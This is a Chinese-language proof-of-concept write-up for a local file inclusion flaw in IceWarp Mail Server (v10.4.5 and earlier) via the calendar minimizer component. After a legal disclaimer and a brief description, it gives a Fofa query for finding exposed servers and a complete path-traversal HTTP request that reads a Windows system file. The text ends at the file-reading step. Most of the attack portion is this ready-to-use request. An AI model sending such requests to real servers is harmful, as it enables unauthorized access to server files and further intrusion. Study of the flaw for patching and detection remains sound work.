爱思华宝邮件服务器本地文件包含漏洞

免责声明

仅用于技术交流,目的是向相关安全人员展示漏洞利用方式,以便更好地提高网络安全意识和技术水平。
任何人不得利用该文章进行非法攻击和侵犯他人的隐私和财产权利。一旦发生任何违法行为,责任自负。
该文章仅用于授权测试,任何未经授权的测试均属于非法行为。请在法律许可范围内使用。
作者对使用该文章导致的任何直接或间接损失不承担任何责任。使用此文章的风险由使用者自行承担。

漏洞描述

爱思华宝邮件服务器 v10.4.5 被发现通过组件 /calendar/minimizer/index.php 包含本地文件包含 (LFI) 漏洞。 此漏洞允许攻击者包含或执行目标服务器本地文件系统中的文件。

漏洞影响

IceWarp Mail Server ≤ v10.4.5

漏洞危害

未经允许的攻击者可通过该漏洞获取服务器敏感信息从而进一步渗透

网络测绘

Fofa: title=“Icewarp web klient”

漏洞复现

1. 构造poc

GET /-.._._.--.._{任意值}/webmail/calendar/minimizer/index.php?style=..\..\..\..\..\..\..\..\windows/win.ini HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: use_cookies=1; use_cookies=1
Upgrade-Insecure-Requests: 1

2. 读取文件